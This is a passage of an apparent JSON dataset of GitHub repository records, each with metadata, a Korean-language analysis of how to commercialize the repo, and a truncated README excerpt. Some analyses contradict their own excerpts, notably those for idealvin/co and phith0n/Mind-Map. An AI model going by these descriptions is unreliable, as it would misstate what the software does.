@@@@@           @@@@@@   { }   { }    @@@@@@@\n                         @@@    @@@                                 @@@@@@@@@@@@@@@@@@@@@@@@@@@@\n      @@@@@@            @@@    @@@                 ","composite_score":0.3793,"license_safety_tag":"safe"},{"name":"Urinx/WeixinBot","github_url":"https://github.com/Urinx/WeixinBot","stars":5,"language":"Python","license":"apache-2.0","abandonment_months":79,"description":"# WeixinBot 상용화 분석\n\n## 왜 보물인가\nWeChat(위챗) 자동화 봇을 쉽게 만들 수 있는 도구로, 중국 최대 메신저 플랫폼에서 비즈니스 자동화를 원하는 모든 기업의 필수 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **고객 상담 자동화 SaaS**: 위챗 기반 자동 응답 서비스를 구독료 모델로 판매 (월 50~500명 기준)\n2. **전자상","readme_excerpt":"# WeixinBot [![star this repo](http://github-svg-buttons.herokuapp.com/star.svg?user=Urinx&repo=WeixinBot&style=flat&background=1081C1)](http://github.com/Urinx/WeixinBot) [![fork this repo](http://github-svg-buttons.herokuapp.com/fork.svg?user=Urinx&repo=WeixinBot&style=flat&background=1081C1)](http://github.com/Urinx/WeixinBot/fork) ![python](https://img.shields.io/badge/python-2.7%20&%203.6-ff69b4.svg)\n\n网页版微信API，包含终端版微信及微信机器人\n\n## Contents\n* [Demo](#Demo)\n* [Web Weixin Pipeline](#Web-Weixin-Pipeline)\n* [Web Weixin API](#Web-Weixin-API)\n* [Discussion Group](#Discussion-Group)\n* [Recent Update](#Recent-Update)\n\n## <a name=\"Demo\">Demo</a>\n为了确保能正常运行示例脚本，请安装所需的第三方包。\n\n```\npip install -r requirements.txt\n```\n\n注：下面演示的图片与功能可能不是最新的，具体请看源码。\n\n<div align=center>\n<img src=\"imgs/1.png\" width=\"500\" height=\"550\"/>\n</div>\n\n按照操作指示在手机微信上扫描二维码然后登录，你可以选择是否开启自动回复模式。\n\n![2](imgs/2.png)\n\n开启自动回复模式后，如果接收到的是文字消息就会自动回复，包括群消息。\n\n![3](imgs/3.png)\n\n名片，链接，动画表情和地址位置消息。\n\n![4](imgs/4.png)\n\n![5](imgs/5.png)\n\n网页版上有的功能目前基本上","composite_score":0.379,"license_safety_tag":"safe"},{"name":"walkccc/CLRS","github_url":"https://github.com/walkccc/CLRS","stars":8,"language":"Markdown","license":"MIT","abandonment_months":8,"description":"","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://i.imgur.com/ESwjKaR.png\" height=\"150\" alt=\"CLRS\">\n</p>\n\n<div align=\"center\">\n\n# Solutions to **Introduction to Algorithms** _Third Edition_\n\n📚 _A crowdsourced work contributed from nice people all around the world._\n\n![](https://img.shields.io/badge/GitHub%20Pages-121011.svg?logo=github&style=flat-square)\n![](https://img.shields.io/badge/Material%20UI-0081CB.svg?logo=material-ui&style=flat-square)\n![](https://img.shields.io/badge/Markdown-239120.svg?logo=markdown&style=flat-square)\n![](https://img.shields.io/badge/KaTeX-008080.svg?logo=latex&style=flat-square)\n<br/>\n![](https://img.shields.io/badge/PRs-welcome-E87A90.svg?style=flat-square)\n[![](https://img.shields.io/github/contributors/walkccc/CLRS.svg?style=flat-square)](https://github.com/walkccc/CLRS/graphs/contributors)\n[![](https://img.shields.io/github/license/walkccc/CLRS.svg?style=flat-square)](./LICENSE)\n\n</div>\n\n## Getting Started\n\nThis **[website](https://walkccc.github.io/CLRS/)** con","composite_score":0.3784,"license_safety_tag":"safe"},{"name":"wyouflf/xUtils3","github_url":"https://github.com/wyouflf/xUtils3","stars":5,"language":"Java","license":"NOASSERTION","abandonment_months":51,"description":"# xUtils3 저장소 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 반복적으로 작성하는 코드를 미리 만들어둔 도구 모음으로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 안드로이드 앱 개발 플랫폼에 통합하여 개발자가 구독 방식으로 이용하게 하기\n2. **내부 업무 도구**: 모바일 앱 개발사","readme_excerpt":"## xUtils3简介\n\nxUtils 包含了orm, http(s), image, view注解, 但依然很轻量级(251K), 并且特性强大, 方便扩展.\n\n#### 1. `orm`: 高效稳定的orm工具, 使得http接口实现时更方便的支持cookie和缓存.\n* 灵活的, 类似linq表达式的接口.\n* 和greenDao一致的性能.\n\n#### 2. `http(s)`: 基于UrlConnection, Android4.4以后底层为okHttp实现.\n* 请求协议支持11种谓词: GET,POST,PUT,PATCH,HEAD,MOVE,COPY,DELETE,OPTIONS,TRACE,CONNECT\n* 支持超大文件(超过2G)上传\n* 支持断点下载(如果服务端支持Range参数,客户端自动处理断点下载)\n* 支持cookie(实现了domain, path, expiry等特性)\n* 支持缓存(实现了Cache-Control, Last-Modified, ETag等特性, 缓存内容过多时使用过期时间+LRU双重机制清理)\n* 支持异步和同步(可结合RxJava使用)调用\n\n#### 3. `image`: 有了`http(s)`及其下载缓存的支持, `image`模块的实现相当的简洁.\n* 支持内存缓存, 磁盘缓存(缩略图和原图), 并且支持回收被view持有, 但被MemCache移除的图片, 减少页面回退时的闪烁.\n* 支持在ListView滑动时, 自动停止被回收复用的item对应的下载任务(再次下载时断点续传)\n* 支持webp, gif(部分比较老的系统只展示静态图)\n* 支持圆角, 圆形, 方形等裁剪, 支持自动旋转...\n\n#### 4. `view注解`: view注解模块仅仅400多行代码却灵活的支持了各种View注入和事件绑定.\n* 事件注解支持且不受混淆影响...([参考混淆配置](xutils/consumer-rules.pro))\n* 支持绑定拥有多个方法的listener\n\n#### 使用Gradle构建时添加以下依赖即可:\n```javascript\nimplementation 'org.xutils:xutils:3.9.0'\n```\n\n#### 混淆配置参考示例项目sample的配置\n[这里可以下","composite_score":0.3784,"license_safety_tag":"unknown"},{"name":"AcornPublishing/crafting-compiler","github_url":"https://github.com/AcornPublishing/crafting-compiler","stars":13,"language":"C++","license":"unknown","abandonment_months":19,"description":"# AcornPublishing/crafting-compiler 분석\n\n## 왜 보물인가\n프로그래밍 언어를 만드는 방법을 배우고 가르칠 수 있는 교육용 자료로, 소프트웨어 개발의 핵심 원리를 이해하는 데 필수적인 컴파일러 기술을 누구나 접근 가능하게 만들었습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼 SaaS**: 프로그래밍 학생들을 위한 인터랙","readme_excerpt":"# crafting-compiler\n컴파일러 만들기 [컴퓨터 프로그램의 구조와 원리]\n\n# 저자 이메일 주소 정정 안내\nyu-jongwon@naver.com\n","composite_score":0.3783,"license_safety_tag":"unknown"},{"name":"phith0n/Mind-Map","github_url":"https://github.com/phith0n/Mind-Map","stars":5,"language":"","license":"gpl-2.0","abandonment_months":30,"description":"# Mind-Map 저장소 분석\n\n## 왜 보물인가\n복잡한 정보를 시각적으로 정리해주는 도구로, 학습·업무 계획·창의적 아이디어 정리에 필수적인 기능을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 협업 플랫폼으로 팀 프로젝트 관리, 아이디어 공유 기능 탑재\n2. **내부 업무 도구**: 교육 기관의 커리큘럼 설계, 콘텐츠 제","readme_excerpt":"# Mind-Map\n\n各种安全相关思维导图整理收集  \n\n#### [运维安全](https://raw.githubusercontent.com/phith0n/Mind-Map/master/%E8%BF%90%E7%BB%B4%E5%AE%89%E5%85%A8.png)  \n#### [渗透的艺术](https://raw.githubusercontent.com/phith0n/Mind-Map/master/%E6%B8%97%E9%80%8F%E7%9A%84%E8%89%BA%E6%9C%AF.jpg)\n#### [渗透测试](https://raw.githubusercontent.com/phith0n/Mind-Map/master/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95.png)  \n#### [浏览器安全思维导图](https://raw.githubusercontent.com/phith0n/Mind-Map/master/%E6%B5%8F%E8%A7%88%E5%99%A8%E5%AE%89%E5%85%A8%E6%80%9D%E7%BB%B4%E5%AF%BC%E5%9B%BE.jpg)\n#### [情报收集脑图](https://raw.githubusercontent.com/phith0n/Mind-Map/master/%E6%83%85%E6%8A%A5%E6%94%B6%E9%9B%86%E8%84%91%E5%9B%BE.png)\n#### [密码找回逻辑漏洞](https://raw.githubusercontent.com/phith0n/Mind-Map/master/%E5%AF%86%E7%A0%81%E6%89%BE%E5%9B%9E%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E.png)\n#### [安全运维脑图](https://raw.githubusercontent.com/phith0n/Mind-Map/master/%E5%AE%89%E5%85%A8%E8%BF%90%E7%BB%B4%E8%84%91%E5%9B%BE.png)\n#### [企业安全防御思维导图](https://raw.githubuserco","composite_score":0.3783,"license_safety_tag":"restricted"},{"name":"WenDesi/lihang_book_algorithm","github_url":"https://github.com/WenDesi/lihang_book_algorithm","stars":10,"language":"Python","license":"unknown","abandonment_months":86,"description":"# WenDesi/lihang_book_algorithm 분석\n\n## 왜 보물인가\n머신러닝의 핵심 이론을 단계별로 배우고 실제 코드로 구현할 수 있는 교육용 자료집입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 머신러닝 입문자를 위한 체계적인 강좌 콘텐츠로 제공\n2. **기업 내부 교육 도구**: 데이터 분석팀의 신입 직원 온보딩 및 ","readme_excerpt":"<!--\n@Author: WenDesi\n@Date:   09-08-16\n@Email:  wendesi@foxmail.com\n@Last modified by:   WenDesi\n@Last modified time: 09-11-16\n-->\n\n\n\n# lihang_book_algorithm\n被李航老师肯定啦！！开心！\n<br>![](https://raw.githubusercontent.com/WenDesi/lihang_book_algorithm/master/weibo.png)\n\n## 简介\n我这里不介绍任何机器学习算法的原理，只是将《统计学习方法》中每一章的算法用我自己的方式实现一遍。\n除了李航书上的算法外，还实现了一些其他机器学习的算法。\n\n那么我们就按章节来了\n\n## 章节\n\n### 第二章 感知器模型\n博客：[李航《统计学习方法》第二章——用Python实现感知器模型（MNIST数据集）](http://blog.csdn.net/wds2006sdo/article/details/51923546)\n<br>代码：[perceptron/binary_perceptron.py](https://github.com/WenDesi/lihang_book_algorithm/blob/master/perceptron/binary_perceptron.py)\n\n### 第三章 K近邻法\n博客：[李航《统计学习方法》第三章——用Python实现KNN算法（MNIST数据集）](http://blog.csdn.net/wds2006sdo/article/details/51933044)\n<br>代码：[knn/knn.py](https://github.com/WenDesi/lihang_book_algorithm/blob/master/knn/knn.py)\n\n### 第四章 朴素贝叶斯\n博客：[李航《统计学习方法》第四章——用Python实现朴素贝叶斯分类器（MNIST数据集）](http://blog.csdn.net/wds2006sdo/article/details/51967839)\n<br>代码：[naive_bayes/naive_bayes.py](https://github","composite_score":0.3783,"license_safety_tag":"unknown"},{"name":"silviomoreto/bootstrap-select","github_url":"https://github.com/silviomoreto/bootstrap-select","stars":5,"language":"JavaScript","license":"mit","abandonment_months":22,"description":"# bootstrap-select 사업화 분석\n\n## 왜 보물인가\n웹사이트의 드롭다운 메뉴(선택창)를 더 예쁘고 사용하기 좋게 만들어주는 오픈소스 도구로, 수천 개 웹사이트에서 이미 사용 중입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 관리 소프트웨어에 이 기술을 탑재하여 기업 사용자들이 더 쉽게 정보를 선택하도록 만들 수 있습니다","readme_excerpt":"<h1 align=\"center\">bootstrap-select</h1>\n\n<p align=\"center\">\n\t<strong>The jQuery plugin that brings select elements into the 21st century with intuitive multiselection, searching, and much more. Now with Bootstrap 5 support.</strong>\n</p>\n\n<p align=\"center\">\n\t<a href=\"https://github.com/snapappointments/bootstrap-select/releases/latest\" target=\"_blank\">\n\t\t<img src=\"https://img.shields.io/github/release/snapappointments/bootstrap-select.svg\" alt=\"Latest release\">\n\t</a>\n\t<a href=\"https://www.npmjs.com/package/bootstrap-select\" target=\"_blank\">\n\t\t<img src=\"https://img.shields.io/npm/v/bootstrap-select.svg\" alt=\"npm\">\n\t</a>\n\t<a href=\"https://www.nuget.org/packages/bootstrap-select\" target=\"_blank\">\n\t\t<img src=\"https://img.shields.io/nuget/v/bootstrap-select.svg\" alt=\"NuGet\">\n\t</a>\n\t<a href=\"https://cdnjs.com/libraries/bootstrap-select\" target=\"_blank\">\n\t\t<img src=\"https://img.shields.io/cdnjs/v/bootstrap-select.svg\" alt=\"CDNJS\">\n\t</a>\n\t<a href=\"https://www.jsdelivr.com/package/npm/bootstra","composite_score":0.3779,"license_safety_tag":"safe"},{"name":"MasoniteFramework/masonite","github_url":"https://github.com/MasoniteFramework/masonite","stars":5,"language":"Python","license":"MIT","abandonment_months":14,"description":"# Masonite Framework 분석\n\n## 왜 보물인가\n웹사이트나 웹앱을 빠르게 만들 수 있는 파이썬 기반 개발 도구로, 개발자들의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 회사 직원들이 쓸 수 있는 클라우드 기반 업무관리 플랫폼을 빠르게 구축하고 운영하기\n**2. 내부 업무 도구**: 데이터","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4trhpkkdbbzutc5ufxi9.png\" width=\"160px\">\n  <h1 align=\"center\">Masonite</h1>\n</p>\n<p align=\"center\">\n  <img alt=\"GitHub Workflow Status\" src=\"https://img.shields.io/github/actions/workflow/status/MasoniteFramework/masonite/pythonapp.yml\">\n\n  <img alt=\"GitHub release (latest by date including pre-releases)\" src=\"https://img.shields.io/github/v/release/MasoniteFramework/masonite?include_prereleases\">\n  <img src=\"https://img.shields.io/github/license/MasoniteFramework/masonite.svg\" alt=\"License\">\n  <a href=\"https://github.com/psf/black\"><img alt=\"Code style: black\" src=\"https://img.shields.io/badge/code%20style-black-000000.svg\"></a>\n</p>\n\n## About Masonite\n\nStop using old frameworks with just a few confusing features. Masonite is the developer focused dev tool with all the features you need for the rapid development you deserve. Masonite is perfect for beginners getting their first web app deployed or ","composite_score":0.3778,"license_safety_tag":"safe"},{"name":"idealvin/co","github_url":"https://github.com/idealvin/co","stars":12,"language":"C++","license":"NOASSERTION","abandonment_months":12,"description":"# idealvin/co 저장소 분석\n\n## 왜 보물인가\n인공지능이 생성한 잘못된 답변을 자동으로 찾아내고 수정하는 도구로, 챗봇이나 AI 서비스의 신뢰성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 지원 챗봇이 잘못된 정보를 주지 않도록 자동 검증하는 기능 추가\n- **내부 업무 도구**: 회사의 문서 작성 AI","readme_excerpt":"# Coost\r\n\r\nEnglish | [简体中文](readme_cn.md)\r\n\r\n[![Linux Build](https://img.shields.io/github/actions/workflow/status/idealvin/coost/linux.yml?branch=master&logo=linux)](https://github.com/idealvin/coost/actions?query=workflow%3ALinux)\r\n[![Windows Build](https://img.shields.io/github/actions/workflow/status/idealvin/coost/win.yml?branch=master&logo=windows)](https://github.com/idealvin/coost/actions?query=workflow%3AWindows)\r\n[![Mac Build](https://img.shields.io/github/actions/workflow/status/idealvin/coost/macos.yml?branch=master&logo=apple)](https://github.com/idealvin/coost/actions?query=workflow%3AmacOS)\r\n[![Release](https://img.shields.io/github/release/idealvin/coost.svg)](https://github.com/idealvin/coost/releases)\r\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\r\n\r\n**[A tiny boost library in C++11.](https://github.com/idealvin/coost)**\r\n\r\n\r\n\r\n## 0. Introduction\r\n\r\n**[coost](https://github.com/idealvin/coost)** is an elega","composite_score":0.3778,"license_safety_tag":"unknown"},{"name":"fossasia/open-event-webapp","github_url":"https://github.com/fossasia/open-event-webapp","stars":8,"language":"JavaScript","license":"Apache-2.0","abandonment_months":12,"description":"# fossasia/open-event-webapp 분석\n\n## 왜 보물인가\n누구나 쉽게 온라인 행사나 컨퍼런스를 만들고 관리할 수 있는 무료 웹사이트 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 행사 주최자가 월 구독으로 자신의 행사 웹사이트를 자동 생성하는 플랫폼\n2. **내부 업무 도구**: 기업이 자사 컨퍼런스나 세미","readme_excerpt":"# Open Event Website Generator\n![Open Event webapp](./docs/images/wsgen_branding.png)\n[![codecov](https://codecov.io/gh/fossasia/open-event-wsgen/branch/development/graph/badge.svg)](https://codecov.io/gh/fossasia/open-event-wsgen)\n[![Reviewed by Hound](https://img.shields.io/badge/Reviewed_by-Hound-8E64B0.svg)](https://houndci.com)\n[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/open-event-wsgen?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Mailing](https://img.shields.io/badge/Mailing-List-red.svg)](https://groups.google.com/forum/#!forum/open-event)\n[![Twitter Follow](https://img.shields.io/twitter/follow/eventyay.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://x.com/eventyay)\n\n\nThe **Open Event Website Generator App** project has **TWO** components :\n- **An event website generator**\n- **The actual generated website output.**\n\nThe web generator application can generate event websites by getting","composite_score":0.3777,"license_safety_tag":"safe"},{"name":"defunkt/jquery-pjax","github_url":"https://github.com/defunkt/jquery-pjax","stars":9,"language":"JavaScript","license":"mit","abandonment_months":42,"description":"# jquery-pjax 상용화 분석\n\n## 왜 보물인가\n웹사이트를 빠르게 로딩하는 기술로, 사용자 경험을 크게 개선할 수 있는 검증된 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 대시보드 서비스**: 데이터 분석 플랫폼이 페이지 전환 시 필요한 부분만 빠르게 업데이트하여 반응성 개선\n2. **전자상거래 내부 관리 도구**: 재고 관리 시스템","readme_excerpt":"# pjax = pushState + ajax\n\npjax is a jQuery plugin that uses ajax and pushState to deliver a fast browsing experience with real permalinks, page titles, and a working back button.\n\npjax works by fetching HTML from your server via ajax and replacing the content\nof a container element on your page with the loaded HTML. It then updates the\ncurrent URL in the browser using pushState. This results in faster page\nnavigation for two reasons:\n\n* No page resources (JS, CSS) get re-executed or re-applied;\n* If the server is configured for pjax, it can render only partial page\n  contents and thus avoid the potentially costly full layout render.\n\n### Status of this project\n\njquery-pjax is **largely unmaintained** at this point. It might continue to\nreceive important bug fixes, but _its feature set is frozen_ and it's unlikely\nthat it will get new features or enhancements.\n\n## Installation\n\npjax depends on jQuery 1.8 or higher.\n\n### npm\n\n```\n$ npm install jquery-pjax\n```\n\n### standalone script\n\nDow","composite_score":0.3776,"license_safety_tag":"safe"},{"name":"tensorflow/nmt","github_url":"https://github.com/tensorflow/nmt","stars":7,"language":"Python","license":"apache-2.0","abandonment_months":44,"description":"# tensorflow/nmt 프로젝트 분석\n\n## 왜 보물인가\nGoogle이 만든 번역 기술을 누구나 자유롭게 사용하고 개선할 수 있어서, 이를 기반으로 번역 서비스나 다국어 애플리케이션을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **번역 SaaS**: 웹사이트나 문서 자동 번역 서비스 구독 상품\n- **기업용 내부 도구**: 회사 내 여러 언어","readme_excerpt":"# Neural Machine Translation (seq2seq) Tutorial\n\n*Authors: Thang Luong, Eugene Brevdo, Rui Zhao ([Google Research Blogpost](https://research.googleblog.com/2017/07/building-your-own-neural-machine.html), [Github](https://github.com/tensorflow/nmt))*\n\n*This version of the tutorial requires [TensorFlow Nightly](https://github.com/tensorflow/tensorflow/#installation).\nFor using the stable TensorFlow versions, please consider other branches such as\n[tf-1.4](https://github.com/tensorflow/nmt/tree/tf-1.4).*\n\n*If make use of this codebase for your research, please cite\n[this](#bibtex).*\n\n- [Introduction](#introduction)\n- [Basic](#basic)\n   - [Background on Neural Machine Translation](#background-on-neural-machine-translation)\n   - [Installing the Tutorial](#installing-the-tutorial)\n   - [Training – *How to build our first NMT system*](#training--how-to-build-our-first-nmt-system)\n      - [Embedding](#embedding)\n      - [Encoder](#encoder)\n      - [Decoder](#decoder)\n      - [Loss](#loss)\n    ","composite_score":0.3776,"license_safety_tag":"safe"},{"name":"getify/Functional-Light-JS","github_url":"https://github.com/getify/Functional-Light-JS","stars":7,"language":"JavaScript","license":"NOASSERTION","abandonment_months":29,"description":"# Functional-Light-JS 상용화 분석\n\n## 왜 보물인가\n프로그래밍을 배우는 사람들이 어려워하는 '함수형 프로그래밍'을 쉽게 배울 수 있는 교육 자료로, 소프트웨어 개발자 교육 시장에서 수익화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 SaaS**: 인터랙티브 코딩 강좌 플랫폼으로 개발자 대상 월간 구독료 수령\n2. **","readme_excerpt":"# Functional-Light JavaScript\n\n[![License: CC BY-NC-ND 4.0](https://img.shields.io/badge/License-CC%20BY--NC--ND%204.0-blue.svg)](http://creativecommons.org/licenses/by-nc-nd/4.0/)\n\n<a href=\"http://fljsbook.com\"><img src=\"manuscript/images/marketing/front-cover-small.png\" width=\"25%\" align=\"right\" hspace=\"20\" vspace=\"20\" title=\"Functional-Light JavaScript\" alt=\"Book Cover\"></a>\n\nThis book is a balanced, pragmatic look at FP in JavaScript. The first edition is now complete. Read here online **for free**, or:\n\n<p align=\"center\">\n    <a href=\"http://fljsbook.com\"><img src=\"https://img.shields.io/badge/Buy-Leanpub-yellow.svg\" title=\"Buy on Leanpub\" alt=\"Buy on Leanpub\"></a> <a href=\"http://manning.fljsbook.com\"><img src=\"https://img.shields.io/badge/Buy-Manning-yellow.svg\" title=\"Buy on Manning\" alt=\"Buy on Manning\"></a> <a href=\"http://amazon.fljsbook.com\"><img src=\"https://img.shields.io/badge/Buy-Amazon-yellow.svg\" title=\"Buy on Amazon\" alt=\"Buy on Amazon\"></a>\n</p>\n\n\"Functional-Light J","composite_score":0.3773,"license_safety_tag":"unknown"},{"name":"jwilm/alacritty","github_url":"https://github.com/jwilm/alacritty","stars":9,"language":"Rust","license":"apache-2.0","abandonment_months":1,"description":"","readme_excerpt":"<p align=\"center\">\n    <img width=\"200\" alt=\"Alacritty Logo\" src=\"https://raw.githubusercontent.com/alacritty/alacritty/master/extra/logo/compat/alacritty-term%2Bscanlines.png\">\n</p>\n\n<h1 align=\"center\">Alacritty - A fast, cross-platform, OpenGL terminal emulator</h1>\n\n<p align=\"center\">\n  <img alt=\"Alacritty - A fast, cross-platform, OpenGL terminal emulator\"\n       src=\"https://raw.githubusercontent.com/alacritty/alacritty/master/extra/promo/alacritty-readme.png\">\n</p>\n\n## About\n\nAlacritty is a modern terminal emulator that comes with sensible defaults, but\nallows for extensive [configuration](#configuration). By integrating with other\napplications, rather than reimplementing their functionality, it manages to\nprovide a flexible set of [features](./docs/features.md) with high performance.\nThe supported platforms currently consist of BSD, Linux, macOS and Windows.\n\nThe software is considered to be at a **beta** level of readiness; there are\na few missing features and bugs to be fixed,","composite_score":0.3768,"license_safety_tag":"safe"},{"name":"Lemoncode/lcFormValidation","github_url":"https://github.com/Lemoncode/lcFormValidation","stars":5,"language":"TypeScript","license":"mit","abandonment_months":19,"description":"# lcFormValidation 프로젝트 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 사용자가 입력한 정보가 올바른지 자동으로 확인해주는 기술로, 많은 서비스에서 필수적으로 필요합니다.\n\n## 어디에 쓸 수 있나\n1. **회원가입 서비스**: 이메일 형식이 맞는지, 비밀번호가 안전한지 자동 검사하는 SaaS\n2. **기업 업무 도구**: 직원들이 입력한 고","readme_excerpt":"# lcFormValidation\n![build status](https://travis-ci.org/Lemoncode/lcFormValidation.svg?branch=master \"Build Status\")\n\nLcFormValidation is a small JavaScript library that provides you form validation. Validate your viewmodel either on client or server side with Node.js.\nIt is third party / framework agnostic, so you can easily add it in your stack, but it integrates quite well with libraries like React / Redux.\n\n- Heavily based on JavaScript (no html attributes annotations).\n- Full async, all validations are processed as async using native [Promises](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Promise) (LcFormValidation already gives you a polyfill for browsers that do not support promises).\n\n## Documentation\n\nCheck the full documentation in [github.io page](http://lemoncode.github.io/lcFormValidation/).\n\n## Quick start\n\n### Defining validation constraints\n```js\nimport { createFormValidation, Validators } from 'lc-form-validation';\n\nconst customerFo","composite_score":0.3766,"license_safety_tag":"safe"},{"name":"fastai/courses","github_url":"https://github.com/fastai/courses","stars":5,"language":"Jupyter Notebook","license":"apache-2.0","abandonment_months":22,"description":"# fastai/courses 상용화 분석\n\n## 왜 보물인가\n인공지능을 배우고 싶어 하는 수백만 명의 사람들을 위해 이미 검증된 교육 콘텐츠와 실습 자료를 체계적으로 정리해둔 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼(SaaS)**: 인공지능 기초부터 심화까지 배울 수 있는 유료 강의 사이트로 운영 (Udemy, Coursera","readme_excerpt":"# Practical Deep Learning for Coders (fast.ai courses)\n\nThese are the lecture materials from [Practical Deep Learning for Coders](http://course17.fast.ai/) (2017). Two important parts of the course are  [our online forums](http://forums.fast.ai/) and [our wiki](http://wiki.fast.ai/index.php/Main_Page).  If you are encountering an error, we recommend that you first search the forums and wiki for a solution.  If you can't find the answer there, the next step is to ask your question on the forums.  See this advice on [how to ask for help](http://wiki.fast.ai/index.php/How_to_ask_for_Help) in a way that will allow others to most quickly and effectively be able to help you.  Please don't use Github Issues to ask for help debugging (many questions have already been answered in the forums).\n","composite_score":0.3766,"license_safety_tag":"safe"},{"name":"caffe2/caffe2","github_url":"https://github.com/caffe2/caffe2","stars":8,"language":"Shell","license":"apache-2.0","abandonment_months":40,"description":"# Caffe2 저장소 분석\n\n## 왜 보물인가\n페이스북이 만든 머신러닝 엔진으로, 사진 인식이나 영상 분석 같은 인공지능 기능을 쉽게 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **사진 분류 SaaS**: 사용자가 올린 사진을 자동으로 분류해주는 웹 서비스 제공\n2. **기업 내부 도구**: 제조업체의 품질 검사를 자동화하는 비전 검사 시스","readme_excerpt":"# [Source code now lives in the PyTorch repository](https://github.com/pytorch/pytorch/).\n\n## Caffe2\n\nCaffe2 is a lightweight, modular, and scalable deep learning framework. Building on the original [Caffe](http://caffe.berkeleyvision.org), Caffe2 is designed with expression, speed, and modularity in mind.\n\nLearn more about Caffe2 on the [caffe2.ai website](http://caffe2.ai/)\n","composite_score":0.3764,"license_safety_tag":"safe"},{"name":"RedSpider1/concurrent","github_url":"https://github.com/RedSpider1/concurrent","stars":59,"language":"Java","license":"MIT","abandonment_months":17,"description":"# RedSpider1/concurrent 분석\n\n## 왜 보물인가\n여러 작업을 동시에 처리하는 기술을 배우고 활용할 수 있는 실용적인 학습 자료로, 현대적인 소프트웨어 개발에 필수적인 성능 최적화 기술을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 수천 명의 사용자 요청을 동시에 처리하는 클라우드 협업 도구(예: 팀 메신저, 실시","readme_excerpt":"## 文章地址\n- [深入浅出Java多线程](http://concurrent.redspider.group/RedSpider.html)【强烈推荐！！！】\n- [【GithubBook】深入浅出Java多线程](https://redspider.gitbook.io/concurrent/)\n- [PDF](./book.pdf) (PDF生成比较麻烦，不会每个提交都生成，**建议看网页版本**)\n\n## 本地运行\n\n先安装gitbook\n\n```bash\nnpm install gitbook-cli -g\n```\n\n然后安装gitbook插件\n\n```bash\ngitbook install\n```\n\n运行服务\n\n```bash\ngitbook serve .\n```\n\n然后就可以在本地 [http://localhost:4000](http://localhost:4000)访问了。\n\n## 本书简介\n\n笔者在读完市面上关于Java并发编程的资料后，感觉有些知识点不是很清晰，于是在RedSpider社区内展开了对Java并发编程原理的讨论。鉴于开源精神，我们决定将我们讨论之后的Java并发编程原理整理成书籍，分享给大家。\n\n站在巨人的肩上，我们可以看得更远。本书内容的主要来源有博客、书籍、论文，对于一些已经叙述得很清晰的知识点我们直接引用在本书中；对于一些没有讲解清楚的知识点，我们加以画图或者编写Demo进行加工；而对于一些模棱两可的知识点，本书在查阅了大量资料的情况下，给出最合理的解释。\n\n写本书的过程也是对自己研究和掌握的技术点进行整理的过程，希望本书能帮助读者快速掌握并发编程技术。\n\n如果您或者您的单位愿意赞助本书或本社区，请发送邮件到RedSpider社区邮件组redspider@qun.mail.163.com或加微信**redspider-worker**进行洽谈。\n\n## 勘误和支持 \n\n由于笔者的水平有限，编写时间仓促，书中难免会出现一些错误或者不准确的地方，恳请读者批评指正。如果你有更多的宝贵意见，可以在我们的github上新建issue，笔者会尽快解答，期待能够得到你的真挚反馈。github地址：https://github.com/RedSpider1/concurrent\n\n## 公众号\n\n欢迎关注微信公众号“编了个程”，","composite_score":0.3764,"license_safety_tag":"safe"},{"name":"litten/hexo-theme-yilia","github_url":"https://github.com/litten/hexo-theme-yilia","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":23,"description":"# hexo-theme-yilia 상품화 분석\n\n## 왜 보물인가\n블로그나 개인 홈페이지를 쉽게 만들 수 있는 디자인 템플릿으로, 코딩 없이도 전문가 수준의 웹사이트를 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **블로그 호스팅 SaaS**: 개인 블로거들을 위한 구독형 블로깅 플랫폼에서 기본 테마로 제공\n2. **웹사이트 빌더 내부 도구**:","readme_excerpt":"hexo-theme-yilia\r\n================\r\n\r\nYilia 是为 [hexo](https://github.com/tommy351/hexo) 2.4+制作的主题。\r\n崇尚简约优雅，以及极致的性能。 你可以点击 [我的博客](http://litten.me/) 查看效果。           \r\n \r\n如果想体验手机浏览效果，可以扫一下二维码：\r\n\r\n![litten-qrcode](https://cloud.githubusercontent.com/assets/2024949/6349328/51a067fe-bc64-11e4-881c-f68050c50c28.png)\r\n\r\n—————————————————————\r\n\r\n**关于主题：**\r\n\r\n1. 崇尚简约       \r\n2. 追求移动端体验     \r\n3. 希望把加载速度做到极致（努力中）    \r\n4. 让大家把注意力放到内容上。这是本主题设计初衷      \r\n5. 主题不支持IE6，7，8。以后也不会     \r\n\r\n**近期更新（2017.07.09）：**\r\n\r\n2017.07.09\r\n1. 返回顶部\r\n2. 